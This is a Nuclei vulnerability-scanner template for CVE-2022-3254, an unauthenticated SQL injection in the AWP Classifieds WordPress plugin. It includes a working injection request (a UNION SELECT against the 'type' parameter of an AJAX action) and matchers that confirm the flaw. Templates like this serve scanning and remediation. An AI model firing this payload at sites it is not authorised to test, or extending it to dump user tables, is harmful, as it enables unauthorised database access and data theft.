id: CVE-2022-3254

info:
  name: AWP Classifieds <= 4.2.1 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    WordPress Classifieds Plugin before 4.3 contains a SQL injection caused by improper sanitization and escaping of parameters in an AJAX action, letting unauthenticated attackers execute arbitrary SQL commands, exploit requires the premium module to be active.
  remediation: |
    Update to version 4.3 or later.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3254
    - https://wpscan.com/vulnerability/546c47c2-5b4b-46db-b754-c6b43aef2660
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "plugins/another-wordpress-classifieds-plugin/"
  tags: cve,cve2022,sqli,wordpress,wp-plugin,awpcp,unauth,wp,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id`+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'startswith(trim(body), "{")' # Ensure response is JSON structure
          - 'contains_all(body, "options", "status")'
          - '!contains(body, "\"options\":false")'
          - '!regex(body, "\"options\"\\s*:\\s*\\[\\s*\\]")'
        condition: and
# digest: 4a0a00473045022039b01f894e5ae7efd5f6585ba5fc791b47f973783458b2bacc15ff811049b57a022100d7522a9a5044adc9476aba52b88680f8f5e19ef31da77826020390ca250bc773:922c64590222798bb761d5b6d8e72950